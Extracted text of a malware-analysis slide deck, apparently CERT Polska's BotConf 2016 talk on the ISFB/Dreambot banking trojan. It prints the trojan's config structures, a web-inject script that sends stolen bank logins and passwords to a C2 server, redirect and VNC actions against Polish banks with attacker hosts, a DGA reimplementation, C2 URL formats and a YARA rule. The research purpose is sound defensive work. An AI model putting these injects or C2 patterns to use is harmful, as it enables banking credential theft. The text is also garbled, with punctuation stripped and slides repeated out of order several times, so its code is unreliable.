One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 1858
Joined resourcesor FJ-structs
typedef struct DWORD fj_magic DWORD addr DWORD size DWORD crc32_name DWORD flags or with 0x10000 mean it is packed with aPLib isfb_fj_elem
C
1858
02122016 ISFB
httpslokalhostpltalksbotconf20161 1958
Joined resourcesor J1-structs
typedef struct DWORD j1_magic DWORD flags can be aPLib packed DWORD crc32_name DWORD addr DWORD size isfb_fj_elem
C
‐ 0x4F75CEA70x9e154a0c CRC_CLIENT32 ‐ 0xD722AFCB0x8365B9570x8fb1dde1 CRC_CLIENT_INI ‐ 0xE1285E64 CRC_PUBLIC_KEY ‐ 0x90F8AAB40x41982e1f CRC_CLIENT64 ‐ 0x7A042A8A NEW ‐ UNKNOWN
1958
02122016 ISFB
httpslokalhostpltalksbotconf20161 2058
Static configuration typedef struct DWORD off DWORD flags QWORD value QWORD uid isfb_cfg_elem typedef struct QWORD count isfb_cfg_elem[count] char string_table[]
C
2058
Static cfg - fields
02122016 ISFB
httpslokalhostpltalksbotconf20161 2158
Static cfg - fields
0x556aed8f - server0xea9ea760 - bootstrap0x656b798a - botnet0x4fa8693e - key0xd0665bf6 0x75e6145c - domains0xefc574ae - dga_seed0x73177345 - dga_base_url0xec99df2e - dga_tld0xdf351e24 - tor32_dll0x510f22d2 - tor_domains
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
2158
02122016 ISFB
httpslokalhostpltalksbotconf20161 2258
Static cfg
2258
02122016 ISFB
httpslokalhostpltalksbotconf20161 2358
Static cfg
2358
02122016 ISFB
httpslokalhostpltalksbotconf20161 2458
Static cfg
2458
02122016 ISFB
httpslokalhostpltalksbotconf20161 2558
Man in the Browser or where my goes my mony
Dynamic config
02122016 ISFB
httpslokalhostpltalksbotconf20161 2658
Dynamic config typedef structure DWORD size BYTE data[size] inject_elem typedef structure inject_elem target url glob inject_elem action or regex inject_elem params[4] other params inject_chunk typedef injects_t inject_chunk[]
C
2658
02122016 ISFB
httpslokalhostpltalksbotconf20161 2758
Web Injectsvar bn = US_ + BOFA_1 var bot_id = ID_ + bn var sa = decode64() var req = send=0ampu_bot_id= + bot_id + ampbn= + bn+ amppage=8ampu_login=ampu_pass=amplog= + get_me_core sendScriptRequest(sa req function statusCall1() var element = documentgetElementById(loader) elementparentNoderemoveChild(element) ) )()
2758
02122016 ISFB
httpslokalhostpltalksbotconf20161 2858
Web Actions
FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
2858
02122016 ISFB
httpslokalhostpltalksbotconf20161 2958
Web ActionsACTION REDIRECT ‐ Target myjs128js ‐gt http51016736dimyjs128_plv3js ACTION REDIRECT ‐ Target myjs28js ‐gt http51016736dimyjs28_plv3js ACTION REDIRECT ‐ Target ats8gatephp ‐gt http51016736azatsbmidgate128php ACTION REDIRECT ‐ Target httpswwwcentrum24pl ‐gt http51016736fkcen1php ACTION REDIRECT ‐ Target httpscompanynetmbankpl ‐gt http51016736fkmbiz1php ACTION FILE ‐ Target prv ACTION VNC ‐ Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpscompanynetmbankpl | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpskiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsibiznes2 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsplhomebankin | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpshbfaces | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64bin
2958
02122016 ISFB
httpslokalhostpltalksbotconf20161 3058
The Bot
Registry Keys
02122016 ISFB
httpslokalhostpltalksbotconf20161 3158
Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12
InstallClientNetCfgLastTaskLastConfig
middotmiddotmiddotmiddotmiddot
3158
02122016 ISFB
httpslokalhostpltalksbotconf20161 3258
Other Acctions
GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
3258
02122016 ISFB
httpslokalhostpltalksbotconf20161 3358
Calling Home
02122016 ISFB
httpslokalhostpltalksbotconf20161 3458
ET phone home
Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network
middotmiddotmiddotmiddot
3458
02122016 ISFB
httpslokalhostpltalksbotconf20161 3558
DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)
PYTHON
3558
TOR
02122016 ISFB
httpslokalhostpltalksbotconf20161 3658
TOR
3658
02122016 ISFB
httpslokalhostpltalksbotconf20161 3758
P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet
C
3758
02122016 ISFB
httpslokalhostpltalksbotconf20161 3858
Internet is Hard
3858
02122016 ISFB
httpslokalhostpltalksbotconf20161 3958
URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data
3958
02122016 ISFB
httpslokalhostpltalksbotconf20161 4058
URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))
PYTHON
crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887
4058
URL format
02122016 ISFB
httpslokalhostpltalksbotconf20161 4158
URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc
4158
02122016 ISFB
httpslokalhostpltalksbotconf20161 4258
CampC respone
4258
02122016 ISFB
httpslokalhostpltalksbotconf20161 4358
CampC respone
4358
02122016 ISFB
httpslokalhostpltalksbotconf20161 4458
Wiki
Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen
Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES
4458
02122016 ISFB
httpslokalhostpltalksbotconf20161 4558
CampC respone
4558
02122016 ISFB
httpslokalhostpltalksbotconf20161 4658
Command and Control
02122016 ISFB
httpslokalhostpltalksbotconf20161 4758
IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break
4758
02122016 ISFB
httpslokalhostpltalksbotconf20161 4858
IAP
4858
02122016 ISFB
httpslokalhostpltalksbotconf20161 4958
IAP
4958
02122016 ISFB
httpslokalhostpltalksbotconf20161 5058
DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]
5058
Dreambot
02122016 ISFB
httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 1958
Joined resourcesor J1-structs
typedef struct DWORD j1_magic DWORD flags can be aPLib packed DWORD crc32_name DWORD addr DWORD size isfb_fj_elem
C
‐ 0x4F75CEA70x9e154a0c CRC_CLIENT32 ‐ 0xD722AFCB0x8365B9570x8fb1dde1 CRC_CLIENT_INI ‐ 0xE1285E64 CRC_PUBLIC_KEY ‐ 0x90F8AAB40x41982e1f CRC_CLIENT64 ‐ 0x7A042A8A NEW ‐ UNKNOWN
1958
02122016 ISFB
httpslokalhostpltalksbotconf20161 2058
Static configuration typedef struct DWORD off DWORD flags QWORD value QWORD uid isfb_cfg_elem typedef struct QWORD count isfb_cfg_elem[count] char string_table[]
C
2058
Static cfg - fields
02122016 ISFB
httpslokalhostpltalksbotconf20161 2158
Static cfg - fields
0x556aed8f - server0xea9ea760 - bootstrap0x656b798a - botnet0x4fa8693e - key0xd0665bf6 0x75e6145c - domains0xefc574ae - dga_seed0x73177345 - dga_base_url0xec99df2e - dga_tld0xdf351e24 - tor32_dll0x510f22d2 - tor_domains
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
2158
02122016 ISFB
httpslokalhostpltalksbotconf20161 2258
Static cfg
2258
02122016 ISFB
httpslokalhostpltalksbotconf20161 2358
Static cfg
2358
02122016 ISFB
httpslokalhostpltalksbotconf20161 2458
Static cfg
2458
02122016 ISFB
httpslokalhostpltalksbotconf20161 2558
Man in the Browser or where my goes my mony
Dynamic config
02122016 ISFB
httpslokalhostpltalksbotconf20161 2658
Dynamic config typedef structure DWORD size BYTE data[size] inject_elem typedef structure inject_elem target url glob inject_elem action or regex inject_elem params[4] other params inject_chunk typedef injects_t inject_chunk[]
C
2658
02122016 ISFB
httpslokalhostpltalksbotconf20161 2758
Web Injectsvar bn = US_ + BOFA_1 var bot_id = ID_ + bn var sa = decode64() var req = send=0ampu_bot_id= + bot_id + ampbn= + bn+ amppage=8ampu_login=ampu_pass=amplog= + get_me_core sendScriptRequest(sa req function statusCall1() var element = documentgetElementById(loader) elementparentNoderemoveChild(element) ) )()
2758
02122016 ISFB
httpslokalhostpltalksbotconf20161 2858
Web Actions
FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
2858
02122016 ISFB
httpslokalhostpltalksbotconf20161 2958
Web ActionsACTION REDIRECT ‐ Target myjs128js ‐gt http51016736dimyjs128_plv3js ACTION REDIRECT ‐ Target myjs28js ‐gt http51016736dimyjs28_plv3js ACTION REDIRECT ‐ Target ats8gatephp ‐gt http51016736azatsbmidgate128php ACTION REDIRECT ‐ Target httpswwwcentrum24pl ‐gt http51016736fkcen1php ACTION REDIRECT ‐ Target httpscompanynetmbankpl ‐gt http51016736fkmbiz1php ACTION FILE ‐ Target prv ACTION VNC ‐ Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpscompanynetmbankpl | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpskiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsibiznes2 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsplhomebankin | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpshbfaces | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64bin
2958
02122016 ISFB
httpslokalhostpltalksbotconf20161 3058
The Bot
Registry Keys
02122016 ISFB
httpslokalhostpltalksbotconf20161 3158
Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12
InstallClientNetCfgLastTaskLastConfig
middotmiddotmiddotmiddotmiddot
3158
02122016 ISFB
httpslokalhostpltalksbotconf20161 3258
Other Acctions
GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
3258
02122016 ISFB
httpslokalhostpltalksbotconf20161 3358
Calling Home
02122016 ISFB
httpslokalhostpltalksbotconf20161 3458
ET phone home
Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network
middotmiddotmiddotmiddot
3458
02122016 ISFB
httpslokalhostpltalksbotconf20161 3558
DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)
PYTHON
3558
TOR
02122016 ISFB
httpslokalhostpltalksbotconf20161 3658
TOR
3658
02122016 ISFB
httpslokalhostpltalksbotconf20161 3758
P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet
C
3758
02122016 ISFB
httpslokalhostpltalksbotconf20161 3858
Internet is Hard
3858
02122016 ISFB
httpslokalhostpltalksbotconf20161 3958
URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data
3958
02122016 ISFB
httpslokalhostpltalksbotconf20161 4058
URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))
PYTHON
crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887
4058
URL format
02122016 ISFB
httpslokalhostpltalksbotconf20161 4158
URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc
4158
02122016 ISFB
httpslokalhostpltalksbotconf20161 4258
CampC respone
4258
02122016 ISFB
httpslokalhostpltalksbotconf20161 4358
CampC respone
4358
02122016 ISFB
httpslokalhostpltalksbotconf20161 4458
Wiki
Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen
Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES
4458
02122016 ISFB
httpslokalhostpltalksbotconf20161 4558
CampC respone
4558
02122016 ISFB
httpslokalhostpltalksbotconf20161 4658
Command and Control
02122016 ISFB
httpslokalhostpltalksbotconf20161 4758
IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break
4758
02122016 ISFB
httpslokalhostpltalksbotconf20161 4858
IAP
4858
02122016 ISFB
httpslokalhostpltalksbotconf20161 4958
IAP
4958
02122016 ISFB
httpslokalhostpltalksbotconf20161 5058
DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]
5058
Dreambot
02122016 ISFB
httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 2058
Static configuration typedef struct DWORD off DWORD flags QWORD value QWORD uid isfb_cfg_elem typedef struct QWORD count isfb_cfg_elem[count] char string_table[]
C
2058
Static cfg - fields
02122016 ISFB
httpslokalhostpltalksbotconf20161 2158
Static cfg - fields
0x556aed8f - server0xea9ea760 - bootstrap0x656b798a - botnet0x4fa8693e - key0xd0665bf6 0x75e6145c - domains0xefc574ae - dga_seed0x73177345 - dga_base_url0xec99df2e - dga_tld0xdf351e24 - tor32_dll0x510f22d2 - tor_domains
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
2158
02122016 ISFB
httpslokalhostpltalksbotconf20161 2258
Static cfg
2258
02122016 ISFB
httpslokalhostpltalksbotconf20161 2358
Static cfg
2358
02122016 ISFB
httpslokalhostpltalksbotconf20161 2458
Static cfg
2458
02122016 ISFB
httpslokalhostpltalksbotconf20161 2558
Man in the Browser or where my goes my mony
Dynamic config
02122016 ISFB
httpslokalhostpltalksbotconf20161 2658
Dynamic config typedef structure DWORD size BYTE data[size] inject_elem typedef structure inject_elem target url glob inject_elem action or regex inject_elem params[4] other params inject_chunk typedef injects_t inject_chunk[]
C
2658
02122016 ISFB
httpslokalhostpltalksbotconf20161 2758
Web Injectsvar bn = US_ + BOFA_1 var bot_id = ID_ + bn var sa = decode64() var req = send=0ampu_bot_id= + bot_id + ampbn= + bn+ amppage=8ampu_login=ampu_pass=amplog= + get_me_core sendScriptRequest(sa req function statusCall1() var element = documentgetElementById(loader) elementparentNoderemoveChild(element) ) )()
2758
02122016 ISFB
httpslokalhostpltalksbotconf20161 2858
Web Actions
FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
2858
02122016 ISFB
httpslokalhostpltalksbotconf20161 2958
Web ActionsACTION REDIRECT ‐ Target myjs128js ‐gt http51016736dimyjs128_plv3js ACTION REDIRECT ‐ Target myjs28js ‐gt http51016736dimyjs28_plv3js ACTION REDIRECT ‐ Target ats8gatephp ‐gt http51016736azatsbmidgate128php ACTION REDIRECT ‐ Target httpswwwcentrum24pl ‐gt http51016736fkcen1php ACTION REDIRECT ‐ Target httpscompanynetmbankpl ‐gt http51016736fkmbiz1php ACTION FILE ‐ Target prv ACTION VNC ‐ Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpscompanynetmbankpl | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpskiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsibiznes2 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsplhomebankin | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpshbfaces | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64bin
2958
02122016 ISFB
httpslokalhostpltalksbotconf20161 3058
The Bot
Registry Keys
02122016 ISFB
httpslokalhostpltalksbotconf20161 3158
Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12
InstallClientNetCfgLastTaskLastConfig
middotmiddotmiddotmiddotmiddot
3158
02122016 ISFB
httpslokalhostpltalksbotconf20161 3258
Other Acctions
GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
3258
02122016 ISFB
httpslokalhostpltalksbotconf20161 3358
Calling Home
02122016 ISFB
httpslokalhostpltalksbotconf20161 3458
ET phone home
Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network
middotmiddotmiddotmiddot
3458
02122016 ISFB
httpslokalhostpltalksbotconf20161 3558
DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)
PYTHON
3558
TOR
02122016 ISFB
httpslokalhostpltalksbotconf20161 3658
TOR
3658
02122016 ISFB
httpslokalhostpltalksbotconf20161 3758
P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet
C
3758
02122016 ISFB
httpslokalhostpltalksbotconf20161 3858
Internet is Hard
3858
02122016 ISFB
httpslokalhostpltalksbotconf20161 3958
URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data
3958
02122016 ISFB
httpslokalhostpltalksbotconf20161 4058
URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))
PYTHON
crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887
4058
URL format
02122016 ISFB
httpslokalhostpltalksbotconf20161 4158
URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc
4158
02122016 ISFB
httpslokalhostpltalksbotconf20161 4258
CampC respone
4258
02122016 ISFB
httpslokalhostpltalksbotconf20161 4358
CampC respone
4358
02122016 ISFB
httpslokalhostpltalksbotconf20161 4458
Wiki
Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen
